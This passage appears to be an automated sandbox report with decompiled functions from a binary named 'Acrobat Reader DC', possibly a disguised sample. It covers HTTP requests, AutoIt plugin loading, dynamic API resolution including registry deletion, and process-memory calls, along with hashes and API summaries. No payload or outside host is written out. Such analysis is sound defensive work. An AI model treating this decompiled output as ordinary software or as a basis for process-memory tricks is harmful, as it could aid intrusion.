                                    • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                    • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                  • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                  • String ID: @
                                  • API String ID: 4150878124-2766056989
                                  • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                  • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                  • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                  • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044A856(long _a4, long _a8, char _a12) {
                                  				intOrPtr _v12;
                                  				void* _v16;
                                  				char _v48;
                                  				void* _t26;
                                  				void* _t35;
                                  				void* _t38;
                                  				void* _t41;
                                  				void* _t55;
                                  				void* _t57;
                                  				long _t58;
                                  
                                  				_t58 = _a4;
                                  				_t57 = InternetOpenUrlW( *(_t58 + 4),  *(_t58 + 0x20), 0, 0,  *(_t58 + 0x54) & 0x80000000, 0);
                                  				_v16 = _t57;
                                  				_v12 = InternetCloseHandle;
                                  				if(_t57 != 0) {
                                  					E00442516(_t58, _t57, _a8);
                                  					if(HttpSendRequestW(_t57, 0, 0, 0, 0) == 0 || E004318EB(_t57) != 0xc8) {
                                  						_t26 = E004422CB(_t58, 0x2a, 0xdeadbeef, 0);
                                  						E00431861( &_v16);
                                  						return _t26;
                                  					} else {
                                  						_t55 =  &_v48;
                                  						_a4 = 0;
                                  						_a8 = 0x20;
                                  						HttpQueryInfoW(_t57, 5, _t55,  &_a8,  &_a4);
                                  						 *((intOrPtr*)(_t58 + 0x10)) = E0041319B( &_v48);
                                  						 *(_t58 + 0x14) = _t55;
                                  						if(_a12 == 0) {
                                  							_t35 = E004422CB(_t58, 0, 0, 1);
                                  							E00431861( &_v16);
                                  							return _t35;
                                  						} else {
                                  							_t38 = E004424F3(_t58, _t57);
                                  							E00431861( &_v16);
                                  							return _t38;
                                  						}
                                  					}
                                  				} else {
                                  					_t41 = E004422CB(_t58, 0x29, 0xdeadbeef, _t57);
                                  					E00431861( &_v16);
                                  					return _t41;
                                  				}
                                  			}














                                  APIs
                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                  • String ID:
                                  • API String ID: 3705125965-3916222277
                                  • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                  • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                  • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                  • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E00434B02(CHAR* _a4, CHAR* _a8, signed int* _a12) {
                                  				struct HINSTANCE__** _v8;
                                  				struct HINSTANCE__* _v12;
                                  				void* __edi;
                                  				void* __esi;
                                  				struct HINSTANCE__* _t44;
                                  				struct HINSTANCE__** _t45;
                                  				_Unknown_base(*)()* _t50;
                                  				_Unknown_base(*)()*** _t63;
                                  				_Unknown_base(*)()* _t66;
                                  				CHAR* _t92;
                                  				signed int _t94;
                                  
                                  				_t92 = _a4;
                                  				_t44 = LoadLibraryA(_a8);
                                  				_v12 = _t44;
                                  				if(_t44 != 0) {
                                  					_t66 =  *(_t92 + 8);
                                  					_t94 = 0;
                                  					__eflags = _t66;
                                  					if(__eflags != 0) {
                                  						_t63 =  *(_t92 + 4);
                                  						while(1) {
                                  							__eflags =  *( *_t63);
                                  							if(__eflags == 0) {
                                  								goto L6;
                                  							}
                                  							_t94 = _t94 + 1;
                                  							_t63 =  &(_t63[1]);
                                  							__eflags = _t94 - _t66;
                                  							if(__eflags < 0) {
                                  								continue;
                                  							}
                                  							goto L6;
                                  						}
                                  					}
                                  					L6:
                                  					_push(0xc);
                                  					_t45 = E004115D7(_t92, _t94, __eflags);
                                  					_v8 = _t45;
                                  					__eflags = _t94 - _t66;
                                  					if(_t94 != _t66) {
                                  						 *(( *(_t92 + 4))[_t94]) = _t45;
                                  					} else {
                                  						E00436299(_t92,  &_v8);
                                  					}
                                  					 *( *(( *(_t92 + 4))[_t94])) = _v12;
                                  					_t50 = GetProcAddress( *( *(( *(_t92 + 4))[_t94])), "AU3_GetPluginDetails");
                                  					__eflags = _t50;
                                  					if(_t50 != 0) {
                                  						_a4 = 0;
                                  						_a8 = 0;
                                  						 *_t50( &_a4,  &_a8);
                                  						( *(( *(_t92 + 4))[_t94]))[1] = _a4;
                                  						 *_a12 = _t94;
                                  						( *(( *(_t92 + 4))[_t94]))[2] = _a8;
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						FreeLibrary( *( *(( *(_t92 + 4))[_t94])));
                                  						_push( *(( *(_t92 + 4))[_t94]));
                                  						E004111DC();
                                  						 *(( *(_t92 + 4))[_t94]) = 0;
                                  						return 3;
                                  					}
                                  				} else {
                                  					return 3;
                                  				}
                                  			}















                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                  • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                  • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Library$AddressFreeLoadProc
                                  • String ID: AU3_GetPluginDetails
                                  • API String ID: 145871493-4132174516
                                  • Opcode ID: 303b09ba93ab0ed03a6a9af2e9b2030e100027d68ccb66b8423d63a3e79e3eeb
                                  • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                  • Opcode Fuzzy Hash: 303b09ba93ab0ed03a6a9af2e9b2030e100027d68ccb66b8423d63a3e79e3eeb
                                  • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                  • String ID: crts
                                  • API String ID: 943502515-3724388283
                                  • Opcode ID: 2d82e50f2031013929f3e7369429b0b1e1aeb80a721c9f7d558a3d87c3c8a39b
                                  • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                  • Opcode Fuzzy Hash: 2d82e50f2031013929f3e7369429b0b1e1aeb80a721c9f7d558a3d87c3c8a39b
                                  • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004312CC(struct HINSTANCE__** _a4) {
                                  				struct HINSTANCE__* _t4;
                                  				_Unknown_base(*)()* _t5;
                                  				struct HINSTANCE__** _t6;
                                  
                                  				_t6 = _a4;
                                  				if(_t6[2] == 0) {
                                  					_t4 = LoadLibraryA("ICMP.DLL");
                                  					 *_t6 = _t4;
                                  					if(_t4 != 0) {
                                  						_t5 = GetProcAddress(_t4, "IcmpCloseHandle");
                                  						_t6[2] = _t5;
                                  						return _t5;
                                  					}
                                  				}
                                  				return _t4;
                                  			}







                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                  • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpCloseHandle
                                  • API String ID: 2574300362-3530519716
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004312FE(struct HINSTANCE__** _a4) {
                                  				struct HINSTANCE__* _t4;
                                  				_Unknown_base(*)()* _t5;
                                  				struct HINSTANCE__** _t6;
                                  
                                  				_t6 = _a4;
                                  				if(_t6[2] == 0) {
                                  					_t4 = LoadLibraryA("ICMP.DLL");
                                  					 *_t6 = _t4;
                                  					if(_t4 != 0) {
                                  						_t5 = GetProcAddress(_t4, "IcmpCreateFile");
                                  						_t6[2] = _t5;
                                  						return _t5;
                                  					}
                                  				}
                                  				return _t4;
                                  			}







                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                  • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpCreateFile
                                  • API String ID: 2574300362-275556492
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0043129A(struct HINSTANCE__** _a4) {
                                  				struct HINSTANCE__* _t4;
                                  				_Unknown_base(*)()* _t5;
                                  				struct HINSTANCE__** _t6;
                                  
                                  				_t6 = _a4;
                                  				if(_t6[2] == 0) {
                                  					_t4 = LoadLibraryA("ICMP.DLL");
                                  					 *_t6 = _t4;
                                  					if(_t4 != 0) {
                                  						_t5 = GetProcAddress(_t4, "IcmpSendEcho");
                                  						_t6[2] = _t5;
                                  						return _t5;
                                  					}
                                  				}
                                  				return _t4;
                                  			}







                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                  • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpSendEcho
                                  • API String ID: 2574300362-58917771
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00430C7F(struct HINSTANCE__** _a4) {
                                  				struct HINSTANCE__* _t4;
                                  				_Unknown_base(*)()* _t5;
                                  				struct HINSTANCE__** _t6;
                                  
                                  				_t6 = _a4;
                                  				if(_t6[2] == 0) {
                                  					_t4 = LoadLibraryA("advapi32.dll");
                                  					 *_t6 = _t4;
                                  					if(_t4 != 0) {
                                  						_t5 = GetProcAddress(_t4, "RegDeleteKeyExW");
                                  						_t6[2] = _t5;
                                  						return _t5;
                                  					}
                                  				}
                                  				return _t4;
                                  			}







                                  APIs
                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                  • API String ID: 2574300362-4033151799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00430DC1(struct HINSTANCE__** _a4) {
                                  				struct HINSTANCE__* _t4;
                                  				_Unknown_base(*)()* _t5;
                                  				struct HINSTANCE__** _t6;
                                  
                                  				_t6 = _a4;
                                  				if(_t6[2] == 0) {
                                  					_t4 = LoadLibraryA("kernel32.dll");
                                  					 *_t6 = _t4;
                                  					if(_t4 != 0) {
                                  						_t5 = GetProcAddress(_t4, "GetSystemWow64DirectoryW");
                                  						_t6[2] = _t5;
                                  						return _t5;
                                  					}
                                  				}
                                  				return _t4;
                                  			}







                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                  • API String ID: 2574300362-1816364905
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00430E7B(struct HINSTANCE__** _a4) {
                                  				struct HINSTANCE__* _t4;
                                  				_Unknown_base(*)()* _t5;
                                  				struct HINSTANCE__** _t6;
                                  
                                  				_t6 = _a4;
                                  				if(_t6[2] == 0) {
                                  					_t4 = LoadLibraryA("kernel32.dll");
                                  					 *_t6 = _t4;
                                  					if(_t4 != 0) {
                                  						_t5 = GetProcAddress(_t4, "GetModuleHandleExW");
                                  						_t6[2] = _t5;
                                  						return _t5;
                                  					}
                                  				}
                                  				return _t4;
                                  			}







                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430E8D
                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00430E9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetModuleHandleExW$kernel32.dll
                                  • API String ID: 2574300362-199464113
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040EF60(struct HINSTANCE__** __esi) {
                                  				struct HINSTANCE__* _t3;
                                  				_Unknown_base(*)()* _t4;
                                  
                                  				if(__esi[2] == 0) {
                                  					_t3 = LoadLibraryA("kernel32.dll");
                                  					 *__esi = _t3;
                                  					if(_t3 != 0) {
                                  						_t4 = GetProcAddress(_t3, "IsWow64Process");
                                  						__esi[2] = _t4;
                                  						return _t4;
                                  					}
                                  				}
                                  				return _t3;
                                  			}






                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,0040E5C8), ref: 0040EF6B
                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EF7D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: IsWow64Process$kernel32.dll
                                  • API String ID: 2574300362-3024904723
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040EFD0(struct HINSTANCE__** __esi) {
                                  				struct HINSTANCE__* _t3;
                                  				_Unknown_base(*)()* _t4;
                                  
                                  				if(__esi[2] == 0) {
                                  					_t3 = LoadLibraryA("kernel32.dll");
                                  					 *__esi = _t3;
                                  					if(_t3 != 0) {
                                  						_t4 = GetProcAddress(_t3, "GetNativeSystemInfo");
                                  						__esi[2] = _t4;
                                  						return _t4;
                                  					}
                                  				}
                                  				return _t3;
                                  			}






                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,0040E620), ref: 0040EFDB
                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EFED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                  • API String ID: 2574300362-192647395
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00451D2B(char _a4, intOrPtr _a8, WCHAR* _a12, WCHAR** _a16) {
                                  				WCHAR* _v8;
                                  				char _v12;
                                  				WCHAR* _v16;
                                  				char _v20;
                                  				char _v24;
                                  				void* __esi;
                                  				intOrPtr* _t137;
                                  				signed int _t140;
                                  				intOrPtr* _t141;
                                  				intOrPtr* _t146;
                                  				signed int _t148;
                                  				char _t149;
                                  				intOrPtr* _t150;
                                  				signed int _t153;
                                  				intOrPtr* _t166;
                                  				intOrPtr* _t169;
                                  				intOrPtr* _t174;
                                  				intOrPtr* _t177;
                                  				signed int _t179;
                                  				intOrPtr* _t180;
                                  				intOrPtr* _t183;
                                  				intOrPtr* _t190;
                                  				char _t192;
                                  				signed int _t194;
                                  				intOrPtr* _t195;
                                  				intOrPtr* _t198;
                                  				signed int _t200;
                                  				intOrPtr* _t201;
                                  				intOrPtr* _t205;
                                  				WCHAR** _t218;
                                  				signed int _t220;
                                  				signed int _t222;
                                  				char _t227;
                                  				signed int _t231;
                                  				signed int _t232;
                                  				intOrPtr* _t235;
                                  				intOrPtr _t237;
                                  				intOrPtr* _t238;
                                  				short* _t241;
                                  				intOrPtr* _t243;
                                  				intOrPtr* _t247;
                                  				char _t248;
                                  				intOrPtr _t252;
                                  				WCHAR* _t254;
                                  				signed int _t271;
                                  				signed int _t274;
                                  				char _t288;
                                  				intOrPtr _t306;
                                  				WCHAR* _t307;
                                  				signed int _t308;
                                  				signed int _t309;
                                  				signed int _t310;
                                  				signed short _t311;
                                  				signed int* _t312;
                                  				signed short _t313;
                                  				signed int _t314;
                                  				void* _t315;
                                  
                                  				_t137 = _a4;
                                  				_t218 = _a16;
                                  				_t306 = _a8;
                                  				_t218[3] = 0;
                                  				_a4 = 0;
                                  				 *_t218 = 0;
                                  				_t310 =  *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x10))))(_t137, 0, 0x800,  &_a4);
                                  				if(_t310 >= 0) {
                                  					_t140 = E00430EDF( &_a4, 0);
                                  					__eflags = _t140;
                                  					if(_t140 == 0) {
                                  						_t141 = _a4;
                                  						_v8 = 0;
                                  						_t310 =  *((intOrPtr*)( *((intOrPtr*)( *_t141 + 0xc))))(_t141,  &_v12);
                                  						__eflags = _t310;
                                  						if(_t310 < 0) {
                                  							goto L1;
                                  						} else {
                                  							_t227 = _v12;
                                  							__eflags =  *((intOrPtr*)(_t227 + 0x28)) - 3;
                                  							if( *((intOrPtr*)(_t227 + 0x28)) != 3) {
                                  								L12:
                                  								_t146 = _a4;
                                  								_v20 = 0xffffffff;
                                  								_t148 =  *((intOrPtr*)( *((intOrPtr*)( *_t146 + 0x28))))(_t146,  &_a12, 1,  &_v20);
                                  								__eflags = _t148;
                                  								if(_t148 >= 0) {
                                  									L15:
                                  									_t149 = _v12;
                                  									_t311 = 0;
                                  									__eflags = 0 -  *((intOrPtr*)(_t149 + 0x2c));
                                  									if(0 >=  *((intOrPtr*)(_t149 + 0x2c))) {
                                  										goto L30;
                                  									} else {
                                  										while(1) {
                                  											_t166 = _a4;
                                  											_t308 =  *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x14))))(_t166, _t311 & 0x0000ffff,  &_v8);
                                  											__eflags = _t308;
                                  											if(_t308 < 0) {
                                  												break;
                                  											}
                                  											_t247 = _v8;
                                  											__eflags =  *(_t247 + 0x10) & 0x00000003;
                                  											if(( *(_t247 + 0x10) & 0x00000003) == 0) {
                                  												L19:
                                  												_t174 = _a4;
                                  												 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 0x50))))(_t174, _t247);
                                  												_t248 = _v12;
                                  												_t311 = 1 + _t311;
                                  												_v8 = 0;
                                  												__eflags = _t311 -  *((intOrPtr*)(_t248 + 0x2c));
                                  												if(_t311 <  *((intOrPtr*)(_t248 + 0x2c))) {
                                  													continue;
                                  												} else {
                                  													goto L30;
                                  												}
                                  											} else {
                                  												__eflags =  *_t247 - _v20;
                                  												if( *_t247 == _v20) {
                                  													goto L30;
                                  												} else {
                                  													goto L19;
                                  												}
                                  											}
                                  											goto L51;
                                  										}
                                  										_t169 = _a4;
                                  										 *((intOrPtr*)( *((intOrPtr*)( *_t169 + 0x4c))))(_t169, _v12);
                                  										E00430EAD( &_a4);
                                  										return _t308;
                                  									}
                                  								} else {
                                  									_t177 = _a4;
                                  									_t313 = 0;
                                  									_v16 = 0;
                                  									_t179 =  *((intOrPtr*)( *((intOrPtr*)( *_t177 + 0x1c))))(_t177, _t306,  &_v16, 1,  &_v24);
                                  									__eflags = _t179;
                                  									if(_t179 < 0) {
                                  										_t288 = _v12;
                                  										__eflags = 0 -  *((intOrPtr*)(_t288 + 0x2c));
                                  										if(0 >=  *((intOrPtr*)(_t288 + 0x2c))) {
                                  											L30:
                                  											_t150 = _a4;
                                  											 *((intOrPtr*)( *((intOrPtr*)( *_t150 + 0x4c))))(_t150, _v12);
                                  											_t153 = _v8;
                                  											_t307 = 0;
                                  											__eflags = _t153;
                                  											if(_t153 == 0) {
                                  												goto L8;
                                  											} else {
                                  												_t231 =  *(_t153 + 0x18) & 0x0000ffff;
                                  												__eflags = _t231 - 0x20;
                                  												if(_t231 <= 0x20) {
                                  													 *_t218 = 1;
                                  													_v16 = 0;
                                  													__eflags = 0 - _t231;
                                  													if(0 < _t231) {
                                  														_t104 =  &(_t218[4]); // 0x47984c
                                  														_t312 = _t104;
                                  														do {
                                  															_t237 =  *((intOrPtr*)(_t153 + 8));
                                  															_t274 =  *(_t237 + _t307 + 4) & 0x0000ffff;
                                  															_t238 = _t237 + _t307;
                                  															 *_t312 = _t274;
                                  															__eflags = _t274 - 0x1a;
                                  															if(_t274 == 0x1a) {
                                  																_t220 = 0x00004000 |  *( *_t238 + 4);
                                  																__eflags = _t220;
                                  																 *_t312 = _t220;
                                  																_t218 = _a16;
                                  															}
                                  															__eflags =  *_t312 - 0x1b;
                                  															if( *_t312 == 0x1b) {
                                  																_t222 = 0x00002000 |  *( *_t238 + 4);
                                  																__eflags = _t222;
                                  																 *_t312 = _t222;
                                  																_t218 = _a16;
                                  															}
                                  															__eflags =  *_t312 - 0x1d;
                                  															if( *_t312 == 0x1d) {
                                  																 *_t312 = E0044A545(_a4, _t312, _a4,  *_t238);
                                  																_t153 = _v8;
                                  																_t315 = _t315 + 8;
                                  															}
                                  															_t312[0] =  *((intOrPtr*)( *((intOrPtr*)(_t153 + 8)) + _t307 + 0xc));
                                  															_t241 =  &(_v16[0]);
                                  															_t307 = _t307 + 0x10;
                                  															_t312 =  &(_t312[1]);
                                  															_v16 = _t241;
                                  															__eflags = _t241 -  *(_t153 + 0x18);
                                  														} while (_t241 <  *(_t153 + 0x18));
                                  													}
                                  													_t232 =  *(_t153 + 0x24) & 0x0000ffff;
                                  													_t271 = _t232 - 0x16;
                                  													__eflags = _t271 - 3;
                                  													if(_t271 <= 3) {
                                  														switch( *((intOrPtr*)(_t271 * 4 +  &M0045212B))) {
                                  															case 0:
                                  																_t232 = 3;
                                  																goto L48;
                                  															case 1:
                                  																__ecx = 0x13;
                                  																goto L48;
                                  															case 2:
                                  																__ecx = 0;
                                  																goto L48;
                                  															case 3:
                                  																__ecx = 0xa;
                                  																goto L48;
                                  														}
                                  													}
                                  													L48:
                                  													_t218[3] = _t232;
                                  													_t218[1] =  *(_t153 + 0x10);
                                  													_t218[3] =  *(_t153 + 0x18);
                                  													_t235 = _a4;
                                  													_t218[2] =  *(_t153 + 0x14);
                                  													 *((intOrPtr*)( *((intOrPtr*)( *_t235 + 0x50))))(_t235, _t153);
                                  													E00430EAD( &_a4);
                                  													__eflags = 0;
                                  													return 0;
                                  												} else {
                                  													_t243 = _a4;
                                  													 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 0x50))))(_t243, _t153);
                                  													E00430EAD( &_a4);
                                  													return 0x80004005;
                                  												}
                                  											}
                                  										} else {
                                  											while(1) {
                                  												_t180 = _a4;
                                  												_t309 =  *((intOrPtr*)( *((intOrPtr*)( *_t180 + 0x14))))(_t180, _t313 & 0x0000ffff,  &_v8);
                                  												_t183 = _a4;
                                  												_t252 =  *_t183;
                                  												__eflags = _t309;
                                  												if(_t309 < 0) {
                                  													break;
                                  												}
                                  												 *((intOrPtr*)( *((intOrPtr*)(_t252 + 0x30))))(_t183,  *_v8,  &_v16, 0, 0, 0);
                                  												_t254 = _v8;
                                  												__eflags =  *(_t254 + 0x10) & 0x00000003;
                                  												if(( *(_t254 + 0x10) & 0x00000003) == 0) {
                                  													L26:
                                  													__imp__#6(_v16);
                                  													_t190 = _a4;
                                  													 *((intOrPtr*)( *((intOrPtr*)( *_t190 + 0x50))))(_t190, _v8);
                                  													_t192 = _v12;
                                  													_t313 = 1 + _t313;
                                  													_v8 = 0;
                                  													__eflags = _t313 -  *((intOrPtr*)(_t192 + 0x2c));
                                  													if(_t313 <  *((intOrPtr*)(_t192 + 0x2c))) {
                                  														continue;
                                  													} else {
                                  														goto L30;
                                  													}
                                  												} else {
                                  													_t194 = lstrcmpiW(_v16, _a12);
                                  													__eflags = _t194;
                                  													if(_t194 == 0) {
                                  														__imp__#6(_v16);
                                  														goto L30;
                                  													} else {
                                  														goto L26;
                                  													}
                                  												}
                                  												goto L51;
                                  											}
                                  											 *((intOrPtr*)( *((intOrPtr*)(_t252 + 0x4c))))(_t183, _v12);
                                  											E00430EAD( &_a4);
                                  											return _t309;
                                  										}
                                  									} else {
                                  										__imp__#6(_v16);
                                  										_v20 = _t306;
                                  										goto L15;
                                  									}
                                  								}
                                  							} else {
                                  								__eflags =  *(_t227 + 0x36) & 0x00000040;
                                  								if(( *(_t227 + 0x36) & 0x00000040) == 0) {
                                  									goto L12;
                                  								} else {
                                  									_t195 = _a4;
                                  									 *((intOrPtr*)( *((intOrPtr*)( *_t195 + 0x4c))))(_t195, _t227);
                                  									_t198 = _a4;
                                  									_t200 =  *((intOrPtr*)( *((intOrPtr*)( *_t198 + 0x20))))(_t198, 0xffffffff,  &_v24);
                                  									__eflags = _t200;
                                  									if(_t200 < 0) {
                                  										L8:
                                  										E00430EAD( &_a4);
                                  										return 0x80004005;
                                  									} else {
                                  										_t201 = _a4;
                                  										_v16 = 0;
                                  										__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t201 + 0x38))))(_t201, _v24,  &_v16);
                                  										if(__eflags >= 0) {
                                  											E00441E8D(__eflags,  &_a4,  &_v16);
                                  											_t205 = _a4;
                                  											_t314 =  *((intOrPtr*)( *((intOrPtr*)( *_t205 + 0xc))))(_t205,  &_v12);
                                  											__eflags = _t314;
                                  											if(_t314 >= 0) {
                                  												E00430EAD( &_v16);
                                  												goto L12;
                                  											} else {
                                  												E00430EAD( &_v16);
                                  												E00430EAD( &_a4);
                                  												return _t314;
                                  											}
                                  										} else {
                                  											E00430EAD( &_v16);
                                  											goto L8;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					} else {
                                  						E00430EAD( &_a4);
                                  						return 0x80004001;
                                  					}
                                  				} else {
                                  					L1:
                                  					E00430EAD( &_a4);
                                  					return _t310;
                                  				}
                                  				L51:
                                  			}

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
